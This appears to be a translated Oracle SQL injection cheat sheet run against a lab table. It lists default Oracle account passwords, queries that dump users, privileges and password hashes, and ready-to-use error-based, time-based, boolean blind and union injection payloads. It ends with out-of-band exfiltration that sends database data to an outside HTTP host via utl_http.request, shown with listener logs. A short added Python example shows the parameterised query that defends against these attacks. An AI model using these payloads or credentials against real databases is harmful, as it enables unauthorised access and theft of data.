Oracle Injection
Basics
When Oracle runs a query it needs a table name after FROM; when there is no real table, use dual. dual is Oracle's dummy table, present only to satisfy the SELECT syntax, and Oracle guarantees that dual always contains exactly one row.
Oracle's data types are strictly matched (MySQL is more loosely typed), so in a UNION query in Oracle the data type at each position must agree with the column type of the table; null can stand in for positions whose type cannot be guessed quickly.
Oracle's single-line comment marker is --, and the multi-line comment markers are /* */.
Default users:
SYS user: super administrator, default password change_on_install. Has the privilege to create a database.
SYSTEM user: system administrator, default password manager. Does not have the privilege to create a database!
scott user: default password tiger. An ordinary user's privileges are whatever the SYS or SYSTEM user granted.
Default system tablespaces:
SYSTEM
SYSAUX
Basic syntax
select column, group_function(column)
from table
[where condition]
[group by group_by_expression]
[having group_condition]
[order by column];
- select must name a table. If the query is not against a real table, use dual as the table name.
- Single and double quotes: Oracle's single quote behaves as in MySQL, but double quotes are used to escape reserved words. For example, if a table has a column named sysdate, which is an Oracle keyword, you query it with select "sysdate" from table_name; select 'sysdate' from table_name is equivalent to select sysdate from table_name, and sysdate returns the current time.
- Row n of a result. Oracle: SELECT column_name FROM (SELECT ROWNUM r, column_name FROM table_name ORDER BY column_name) WHERE r=n; MySQL: select column_name from table_name limit n, 1. Note that ROWNUM is assigned before ORDER BY is applied, so r follows the scan order of the table, not the sorted order.
- String concatenation. Oracle: SELECT 'a' || 'b' FROM dual; MySQL: select 'a' 'b' (in MySQL, || is the logical OR operator).
- CASE syntax. Oracle: SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; MySQL: SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; (identical).
- In Oracle the empty string '' is null (there is only null, no empty string), whereas MySQL distinguishes null from ''.
- Oracle has no limit; emulate it with the rownum pseudo-column of an inline view, filtered in the where clause.
Operators
Oracle relational operators
Oracle relational operators are used constantly in where clauses; the common ones are:

| Symbol | Meaning | Symbol | Meaning |
|---|---|---|---|
| = | equal | <> or != or ^= or not xxx=yyy or not(xxx=yyy) | not equal |
| > | greater than | >= | greater than or equal |
| < | less than | <= | less than or equal |
| => | named-parameter association (assigns a value to a named parameter) | | |

Oracle logical operators
Oracle has three logical operators: AND, OR, NOT.
Special symbols

| Symbol | Description |
|---|---|
| % | matches any number of characters, possibly none |
| _ | matches exactly one unknown character |
| ? | matches exactly one unknown character |
| # | matches exactly one Arabic digit, 0 to 9 |
| [a-d] | a character range, here a to d |
| ' | In Oracle, only single quotes should be used to enclose text, characters and dates; numbers must not be enclosed in quotes (single or double) |
| " | In Oracle, single and double quotes mean different things. Double quotes enclose column aliases that contain special characters or spaces, and also embed literal text in a date format |
| ' | In Oracle, an apostrophe can also be written as two adjacent single quotes. To find all supplier names that contain an apostrophe, write: select * from l_suppliers where supplier_name like '%''%' |
| & | In Oracle the & symbol usually marks a variable: &fox is a variable, and &&fox is a slightly different one. Every time &fox appears in an Oracle script you are prompted for its value; with &&fox you are prompted only the first time it appears. To use & as an ordinary character, turn the feature off with set define off, which is a SQL*Plus command, not a SQL command (SQL*Plus sets up the environment in which SQL runs in Oracle) |
| \|\| | Oracle uses the double vertical bar for string concatenation |
| * | select * selects all columns, count(*) counts all rows, and as a wildcard * matches zero or more characters |
| / | In Oracle, terminates a SQL statement; more precisely, it means "run the SQL currently in the buffer". The forward slash is also used as a separator |
| /* */ | multi-line comment |
| -- | single-line comment |
Detecting injection
'
id=1' and 1<>2
id=1' and 1=1
id=book'||'4yi
Basic usage
1. Probe the version:
1.1 Server version
SQL> SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
SQL> SELECT version FROM v$instance;
VERSION
-----------------
11.2.0.1.0
1.2 Operating system version
SQL> SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
BANNER
--------------------------------------------------------------------------------
TNS for 64-bit Windows: Version 11.2.0.1.0 - Production
Oracle's SELECT statement must contain a FROM clause, so when we are not really querying a table we must use the dummy table 'dual'.
2. User information:
2.1 Current user
SQL> select user FROM dual;
USER
------------------------------
SYSTEM
2.2 All database users
SQL> SELECT username FROM all_users ORDER BY username;
USERNAME
------------------------------
ANONYMOUS
APEX_030200
APEX_PUBLIC_USER
APPQOSSYS
CTXSYS
DBSNMP
DIP
EXFSYS
FLOWS_FILES
MDDATA
MDSYS
USERNAME
------------------------------
MGMT_VIEW
MYSQL
NOTEB
OLAPSYS
ORACLE_OCM
ORDDATA
ORDPLUGINS
ORDSYS
OUTLN
OWBSYS
OWBSYS_AUDIT
USERNAME
------------------------------
SCOTT
SI_INFORMTN_SCHEMA
SPATIAL_CSW_ADMIN_USR
SPATIAL_WFS_ADMIN_USR
SYS
SYSMAN
SYSTEM
WMSYS
XDB
XS$NULL
已选择32行。
SELECT name FROM sys.user$; -- priv: requires DBA privileges
SQL> SELECT name FROM sys.user$;
NAME
------------------------------
ADM_PARALLEL_EXECUTE_TASK
ANONYMOUS
APEX_030200
APEX_ADMINISTRATOR_ROLE
APEX_PUBLIC_USER
APPQOSSYS
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
CONNECT
CSW_USR_ROLE
NAME
------------------------------
CTXAPP
...
XS$NULL
NAME
------------------------------
_NEXT_USER
已选择89行。
List DBA accounts (super administrators):
SQL> SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION ='YES';
GRANTEE
------------------------------
AQ_ADMINISTRATOR_ROLE
DBA
SCHEDULER_ADMIN
OWBSYS
APEX_030200
SYSTEM
SYS
WMSYS
已选择8行。
(requires super administrator) Lists the DBAs and their corresponding privileges.
List all users:
SQL> SELECT username FROM all_users ORDER BY username;
USERNAME
------------------------------
ANONYMOUS
APEX_030200
...
------------------------------
OWBSYS
OWBSYS_AUDIT
PM
SCOTT
SH
SI_INFORMTN_SCHEMA
SPATIAL_CSW_ADMIN_USR
SPATIAL_WFS_ADMIN_USR
SYS
SYSMAN
SYSTEM
USERNAME
------------------------------
WMSYS
XDB
XS$NULL
已选择36行。
SQL> SELECT name FROM sys.user$;
NAME
------------------------------
ADM_PARALLEL_EXECUTE_TASK
ANONYMOUS
APEX_030200
APEX_ADMINISTRATOR_ROLE
APEX_PUBLIC_USER
APPQOSSYS
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
BI
CONNECT
NAME
------------------------------
...
NAME
------------------------------
XDB_WEBSERVICES
XDB_WEBSERVICES_OVER_HTTP
XDB_WEBSERVICES_WITH_PUBLIC
XS$NULL
_NEXT_USER
已选择93行。
(requires super administrator privileges)
List privileges:
SQL> SELECT * FROM session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
PRIVILEGE
----------------------------------------
...
PRIVILEGE
----------------------------------------
UPDATE ANY CUBE BUILD PROCESS
UPDATE ANY CUBE DIMENSION
ADMINISTER SQL MANAGEMENT OBJECT
FLASHBACK ARCHIVE ADMINISTER
已选择202行。
-- lists the current user's privileges
SQL> SELECT * FROM dba_sys_privs WHERE grantee ='DBSNMP';
GRANTEE PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
DBSNMP CREATE PROCEDURE NO
DBSNMP UNLIMITED TABLESPACE NO
DBSNMP SELECT ANY DICTIONARY NO
DBSNMP CREATE TABLE NO
(requires super administrator) Lists the privileges of a specified user.
SQL> SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY';
GRANTEE
------------------------------
OLAPSYS
DBA
WMSYS
SYSMAN
ORACLE_OCM
OEM_MONITOR
DBSNMP
IX
已选择8行。
(requires super administrator) Finds the users that hold a given privilege.
SQL> SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
GRANTEE GRANTED_ROLE
------------------------------ ------------------------------
SYS XDB_SET_INVOKER
SYS XDBADMIN
SYS JMXSERVER
SYS IMP_FULL_DATABASE
DBA OLAP_DBA
DBA SCHEDULER_ADMIN
DBA DATAPUMP_IMP_FULL_DATABASE
SYSTEM AQ_ADMINISTRATOR_ROLE
EXECUTE_CATALOG_ROLE HS_ADMIN_EXECUTE_ROLE
HS_ADMIN_ROLE HS_ADMIN_EXECUTE_ROLE
OEM_MONITOR SELECT_CATALOG_ROLE
GRANTEE GRANTED_ROLE
------------------------------ ------------------------------
...
GRANTEE GRANTED_ROLE
------------------------------ ------------------------------
OUTLN RESOURCE
XDB JAVAUSERPRIV
MDSYS CONNECT
MDDATA RESOURCE
SPATIAL_WFS_ADMIN_USR CONNECT
APEX_030200 CONNECT
OWBSYS CWM_USER
SCOTT CONNECT
IX AQ_USER_ROLE
IX SELECT_CATALOG_ROLE
已选择142行。
Password hashes of all database users
SELECT name, password, astatus FROM sys.user$; -- priv: DBA privileges, version <= 10g
SQL> SELECT name, password, astatus FROM sys.user$;
NAME PASSWORD ASTATUS
------------------------------ ------------------------------ ----------
SYS 466C75A1248EDE33 0
PUBLIC 0
CONNECT 0
RESOURCE 0
DBA 0
SYSTEM 49DDDB61ECBD4BBB 0
SELECT_CATALOG_ROLE 0
...
OWBSYS_AUDIT FD8C3D14F6B60015 9
SCOTT F894844C34402B67 9
NOTEB 0FBAC101DF13AB47 0
NAME PASSWORD ASTATUS
------------------------------ ------------------------------ ----------
MYSQL F44DC9BEF7D1E9A9 0
已选择89行。
SELECT name, spare4 FROM sys.user$; -- priv: DBA privileges, version >= 11g
3. Current database:
SQL> SELECT global_name FROM global_name;
GLOBAL_NAME
--------------------------------------------------------------------------------
TEST
SQL> SELECT name FROM v$database;
NAME
---------
TEST
SQL> SELECT instance_name FROM v$instance;
INSTANCE_NAME
----------------
test
SQL> SELECT SYS.DATABASE_NAME FROM DUAL;
DATABASE_NAME
--------------------------------------------------------------------------------
TEST
4. List table names:
SQL> SELECT table_name FROM all_tables;
TABLE_NAME
------------------------------
ICOL$
CON$
UNDO$
PROXY_ROLE_DATA$
FILE$
UET$
IND$
SEG$
COL$
CLU$
PROXY_DATA$
...
...
TABLE_NAME
------------------------------
WWV_MIG_OLB_CG_CT_TEXTSEGMENT
OWBRTPS
DEPT
EMP
BONUS
SALGRADE
TEST
c1o2a3
已选择2725行。
SQL> SELECT owner, table_name FROM all_tables;
OWNER TABLE_NAME
------------------------------ ------------------------------
SYS ICOL$
SYS CON$
SYS UNDO$
SYS PROXY_ROLE_DATA$
SYS FILE$
SYS UET$
SYS IND$
SYS SEG$
SYS COL$
SYS CLU$
SYS PROXY_DATA$
...
...
OWNER TABLE_NAME
------------------------------ ------------------------------
APEX_030200 WWV_MIG_OLB_CG_CT_TEXTSEGMENT
OWBSYS OWBRTPS
SCOTT DEPT
SCOTT EMP
SCOTT BONUS
SCOTT SALGRADE
SYSTEM TEST
NOTEB c1o2a3
已选择2725行。
5. List column names:
SELECT column_name FROM all_tab_columns WHERE table_name = '<table_name>';
SQL> SELECT column_name FROM all_tab_columns WHERE table_name = 'c1o2a3';
COLUMN_NAME
------------------------------
id
username
password
SELECT column_name FROM all_tab_columns WHERE table_name = '<table_name>' and owner = '<user>';
5.1 Find the table from a column name:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
SQL> SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE 'password';
OWNER TABLE_NAME
------------------------------ ------------------------------
NOTEB c1o2a3
Note: table names are stored in upper case (c1o2a3 here was created as a quoted, lower-case identifier, which is why it is matched in lower case).
5.2 Query row N:
SQL> SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;
USERNAME
------------------------------
SYSMAN
Returns row 9 (counting from 1).
6. Query the Nth character:
SQL> SELECT substr('abcd', 3, 1) FROM dual;
S
-
c
Returns the third character, 'c'.
7. Character to ASCII code:
SQL> SELECT ascii('A') FROM dual;
ASCII('A')
----------
65
Returns 65.
8. ASCII value to character:
SQL> SELECT chr(65) FROM dual;
C
-
A
Returns A.
9. Type conversion:
SQL> SELECT CAST(1 AS char) FROM dual;
C
-
1
SQL> SELECT CAST('1' AS int) FROM dual;
CAST('1'ASINT)
--------------
1
Format: Cast(column_name as target_type)
10. String concatenation:
SQL> SELECT 'A' || 'B' FROM dual;
'A
--
AB
Returns AB.
11. Create a user:
11.1 Create the user
SQL> CREATE USER test IDENTIFIED BY 123456;
用户已创建。
11.2 Grant privileges to the user:
SQL> GRANT CONNECT, RESOURCE, DBA TO test;
授权成功。
11.3 Log in as the new user:
SQL> CONNECT test@orcl
输入口令:
已连接。
12. Create a database:
Create the two database files (test.dbf and test_temp.dbf):
CREATE TABLESPACE test LOGGING DATAFILE 'C:\app\test\oradata\test\test.dbf'
SIZE 100M AUTOEXTEND ON NEXT 32M MAXSIZE 500M EXTENT MANAGEMENT LOCAL
> OK
> 时间: 0.284s
create temporary tablespace test_temp tempfile 'C:\app\test\oradata\orcl\test_temp.dbf'
size 100m autoextend on next 32m maxsize 500m extent management local;
Create the user mapped to the files created above (user name test, password Test123456):
CREATE USER test IDENTIFIED BY Test123456 DEFAULT TABLESPACE test TEMPORARY TABLESPACE test_temp
> OK
> 时间: 0.024s
13. Grant privileges:
(connect, resource and dba are privilege/role names)
grant connect,resource,dba to test;
> OK
> 时间: 0.021s
grant create session to test;
> OK
> 时间: 0.003s
14. Drop the database (tablespace):
DROP TABLESPACE test INCLUDING CONTENTS AND DATAFILES
> OK
> 时间: 0.313s
15. Drop the user:
drop user test cascade
> OK
> 时间: 1.641s
Error-based injection
1. utl_inaddr.*()
-- query the user name
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select utl_inaddr.get_host_name((select user from dual)) from dual)>0 -- '
-- query the database
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (SELECT global_name FROM global_name)) from dual)>0 -- '
-- query the first table
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (select table_name from user_tables where rownum=1)) from dual)>0 -- '
-- query the second table
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (select table_name from user_tables where rownum=1 and table_name <> 'c1o2a3')) from dual)>0 -- '
-- query the columns
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1)) from dual)>0 -- '
-- query the second column
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1)) from dual)>0 -- '
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (select "username" from "c1o2a3" where rownum=1)) from dual)>0 -- '
This method needs no privileges on Oracle 8i, 9i and 10g, but from Oracle 11g onward access control was tightened, so to use it for error-based injection on 11g and later the current database user must have network access privileges. The same applies to the following three:
- UTL_HTTP.REQUEST
- HTTP_URITYPE.GETCLOB
- DBMS_LDAP.INIT and UTL_TCP
2. ctxsys.drithsx.sn()
-- query the current database user
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(select user from dual))=1 -- ';
-- query database information
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(SELECT global_name FROM global_name))<>1 -- ';
-- query the first table
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))<>1 -- ';
-- query the columns
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1))<>1 -- ';
-- query the second column
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1))<>1 -- ';
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(select "username" from "c1o2a3" where rownum=1))<>1 -- ';
3. XMLType()
-- query the current database user
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null -- '
-- query database information
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(SELECT global_name FROM global_name)||chr(62))) from dual) is not null -- '
-- query the first table
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(select table_name from user_tables where rownum=1)||chr(62))) from dual) is not null -- '
-- query the columns
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1)||chr(62))) from dual) is not null -- '
-- query the second column
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1)||chr(62))) from dual) is not null -- '
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(select "username" from "c1o2a3" where rownum=1)||chr(62))) from dual) is not null -- '
4. dbms_xdb_version.makeversioned()
-- query the current database user
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null -- '
-- query database information
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((SELECT global_name FROM global_name)) from dual) is not null -- '
-- query the first table
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((select table_name from user_tables where rownum=1)) from dual) is not null -- '
-- query the columns
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1)) from dual) is not null -- '
-- query the second column
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1)) from dual) is not null -- '
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((select "username" from "c1o2a3" where rownum=1)) from dual) is not null -- '
5. dbms_xdb_version.uncheckout()
-- get the database version
?id=1 and (select dbms_xdb_version.uncheckout((select banner from sys.v_$version where rownum=1)) from dual) is not null --
6. dbms_utility.sqlid_to_sqlhash()
-- get the database version
?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null --
7. ordsys.ord_dicom.getmappingxpath()
-- get the database version
?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user)--
Time-based injection
1. DBMS_PIPE.RECEIVE_MESSAGE
Works in the same way as boolean blind injection; combined with other functions it extracts the same information.
DBMS_PIPE.RECEIVE_MESSAGE (
pipename IN VARCHAR2,
timeout IN INTEGER DEFAULT maxwait)
RETURN INTEGER;
-- for now, read it as DBMS_PIPE.RECEIVE_MESSAGE('any value', delay in seconds)
-- detection
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = DBMS_PIPE.RECEIVE_MESSAGE('1',1) -- ' ;
-- combined with decode and similar functions
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(user,'NOTEB',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
-- combined with decode and SUBSTR
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(SUBSTR(user, 1, 1),'N',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
-- combined with decode, substr and ASCII
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR(user, 1, 1)),'78',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
-- get table names
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR((select table_name from user_tables where rownum=1), 1, 1)),'99',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
-- get columns
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1), 1, 1)),'105',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
-- get data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR((select "username" from "c1o2a3" where rownum=1), 1, 1)),'116',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
2. Other functions
Other functions can be combined in the same way; see boolean blind injection.
For example: select count(*) from all_objects
Because this query takes a noticeable amount of time, it can serve as the delay when dbms_pipe.receive_message() is unavailable. In practice, just substitute it for the value that decode() returns.
-- usage
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(substr(user,1,1),'N',(select count(*) from all_objects),0) from dual) -- ' ;
Boolean blind injection
String functions of all kinds can be used for the injection.
1. decode function
Syntax:
DECODE(value,if1,then1,if2,then2,if3,then3,…,else)
decode(column or expression, value1, value2, value3)
The function returns value2 when the column or expression equals value1, and value3 otherwise.
-- query the user name length
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select length(user) from dual)=5 -- '
-- check whether the user name is NOTEB
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(user,'NOTEB',1,0) from dual) -- '
-- split the current database user name with substr
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(substr(user,1,1),'N',1,0) from dual) -- '
-- split the current database user name with ascii
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr(user,1,1)),'78',1,0) from dual) -- '
-- query the first table name
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr((select table_name from user_tables where rownum=1),1,1)),'99',1,0) from dual) -- '
-- query the first column
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1),1,1)),'105',1,0) from dual) -- '
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr((select "username" from "c1o2a3" where rownum=1),1,1)),'116',1,0) from dual) -- '
2. instr function
INSTR(C1,C2[,I[,J]])
[Function] Searches a string for a given substring and returns the position at which it is found;
[Note] Multi-byte characters (Chinese characters, full-width symbols, etc.) count as one character
[Parameters]
C1 the string being searched
C2 the string to search for
I the start position of the search, default 1
J the Jth occurrence, default 1
[Returns] a number
[Example] select instr('oracle traning','ra',1,2) instring from dual;
Returns: 9
[Example] select instr('重庆某软件公司','某',1,1),instrb('重庆某软件公司','某',1,1) instring from dual;
Returns: 3, 5
-- query the database user name
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select user from dual),'NOTEB')) -- '
-- query the first table name
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select table_name from user_tables where rownum=1),'c1o2')) -- '
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select table_name from user_tables where rownum=1),'c1o2a')) -- '
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select table_name from user_tables where rownum=1),'c1o3')) -- '
-- and so on
3. Other functions
Use other string functions, for example REPLACE:
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = REPLACE((SELECT ASCII(substr(user, 1, 1)) FROM dual),'78',1) -- ' ;
Union-based injection
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select null,null,null from dual --' ORDER by 'id'
-- no error: the first null is of type number
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,null,null from dual --' ORDER by 'id'
-- error: the second null is not of type number
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,1,null from dual --' ORDER by 'id'
-- no error: the second null is a string; continue in the same way
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,'1',null from dual --' ORDER by 'id'
-- query the database version and user name
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual --' ORDER by 'id'
-- query the current database
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(SELECT global_name FROM global_name),null from dual --' ORDER by 'id'
-- query the first table name
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where rownum=1),null from dual --' ORDER by 'id'
-- query the second table name
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where rownum=1 and table_name <> 'c1o2a3'),null from dual --' ORDER by 'id'
-- query the third table name
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where rownum=1 and table_name <> 'test' and table_name <> 'c1o2a3'),null from dual --' ORDER by 'id'
-- fuzzy search
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where table_name like '%user%' and rownum=1),null from dual --' ORDER by 'id';
-- query all table names; wmsys.wm_concat() is the equivalent of MySQL's group_concat(), but it was dropped in 11gR2 and 12c, and LISTAGG() can be used instead
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select LISTAGG(table_name, ',') WITHIN GROUP (ORDER BY owner) name from all_tables where owner='SYSTEM'),null from dual --' ORDER by 'id'
-- LISTAGG() returns varchar, however, so with many tables the string becomes too long; in that case extract it piecewise with substring functions
-- query column names
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1),NULL from dual --' ORDER by 'id'
-- query the second column
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1),NULL from dual --' ORDER by 'id'
-- query data
SELECT * FROM "c1o2a3" WHERE "id" = '-1' union select 1,(select "username" from "c1o2a3"),(select "password" from "c1o2a3") from dual --' ORDER by 'id'
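The statement every payload on this page targets, SELECT * FROM "c1o2a3" WHERE "id" = '1', is built by splicing the request parameter into the SQL text. The following Python is an added example, not code from the original page: it puts that vulnerable builder beside a parameterised version that uses a bind variable, plus an allowlist check for the numeric id. The python-oracledb driver (imported as oracledb) is assumed for the database call, and the connection is a placeholder that is never opened here. The point it demonstrates is that the SQL text of the safe form is identical for any input, so a payload such as 1' union select ... from dual -- can only ever be compared as a value and never changes the statement's structure.

```python
import re

# Table and column names are the ones used on this page; the table was
# created as a quoted, lower-case identifier, hence the double quotes.
TABLE = '"c1o2a3"'


def build_query_vulnerable(user_id: str) -> str:
    """Vulnerable form: the request parameter becomes part of the SQL text.

    A value such as  1' union select null,null,null from dual --  changes the
    statement's structure, which is exactly what the payloads above rely on.
    """
    return f'SELECT * FROM {TABLE} WHERE "id" = \'{user_id}\''


def build_query_safe(user_id: str) -> tuple:
    """Hardened form: constant SQL text plus a bind variable.

    Whatever the caller passes is sent to Oracle as the *value* of :id and is
    never parsed as SQL, so quotes, comments and UNION inside it are inert.
    """
    sql = f'SELECT * FROM {TABLE} WHERE "id" = :id'
    return sql, {"id": user_id}


# The id column holds small integers, so an allowlist of digits is the
# cheapest first line of defence in front of the bind variable.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def validate_id(user_id: str) -> bool:
    """True only for a plain decimal identifier (no quotes, spaces or comments)."""
    return ID_PATTERN.fullmatch(user_id) is not None


def fetch_record(conn, user_id: str):
    """Run the hardened query on an open python-oracledb connection.

    Assumed driver API: conn.cursor(), cursor.execute(sql, binds), fetchall().
    """
    if not validate_id(user_id):
        raise ValueError(f"rejected id parameter: {user_id!r}")
    sql, binds = build_query_safe(user_id)
    with conn.cursor() as cur:
        cur.execute(sql, binds)
        return cur.fetchall()


if __name__ == "__main__":
    # Demonstration without a database: compare the SQL text produced for a
    # benign id and for the UNION payload from the union-based section.
    payload = "1' union select 1,(select user from dual),null from dual --"
    print(build_query_vulnerable(payload))   # structure changed by the input
    print(build_query_safe(payload)[0])      # identical to the benign form
    print(validate_id("1"), validate_id(payload))  # True False
```

Rejecting the parameter with validate_id before it reaches the driver is defence in depth, not a substitute for the bind variable: the bind is what makes the SQL text invariant, the allowlist only stops obviously malformed values early and keeps them out of error messages.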
Out-of-band (OOB) injection
1. utl_http.request()
-- probe whether it is available; the page rendering normally means it is
and exists (select count(*) from all_objects where object_name='UTL_HTTP') --
-- query the version
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(select banner from sys.v_$version where rownum=1))=1 -- ' ;
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:192.168.110.142 - - [26/Aug/2021 17:27:27] code 400, message Bad request syntax ('GET /Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production HTTP/1.1')
-- query the current user name
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(select user from dual))=1 -- ' ;
::ffff:192.168.110.142 - - [26/Aug/2021 17:33:46] "GET /NOTEB HTTP/1.1" 404 -
-- query table names
select table_name from user_tables where rownum=1
::ffff:192.168.110.142 - - [26/Aug/2021 17:35:44] "GET /c1o2a3 HTTP/1.1" 404 -
-- query columns
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1))=1 -- ' ;
